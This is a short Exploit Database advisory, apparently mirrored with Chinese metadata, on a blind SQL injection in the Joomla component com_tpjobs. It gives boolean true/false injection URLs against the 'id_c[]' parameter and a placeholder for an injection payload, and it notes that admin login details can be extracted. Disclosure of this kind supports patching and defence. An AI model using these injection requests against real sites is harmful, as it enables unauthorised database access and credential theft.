Joomla! Component com_tpjobs – Blind SQL Injection

• Exploit Database
• 34 阅读

• 作者： FL0RiX
  日期： 2010-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10950/

• <------------------- header data start ------------------- >
  
  #####################################################################
  #Joomla Component com_tpjobs Blind SQL injection Vulnerability
  #####################################################################
  
  # author: FL0RiX
  
  # Name : com_tpjobs
  
  # Bug Type : (Blind) SQL Injection
  
  # Infection: Admin login bilgileri al&#305;nabilir.
  
  # Demo Vuln. :
  TRUE(+)
  » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1
  FALSE(-)
  » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0
  
  # Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.
  
  #############################################################
  
  < ------------------- header data end of ------------------- >
  
  < -- bug code start -- >
  
  path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]
  
  < -- bug code end of -- >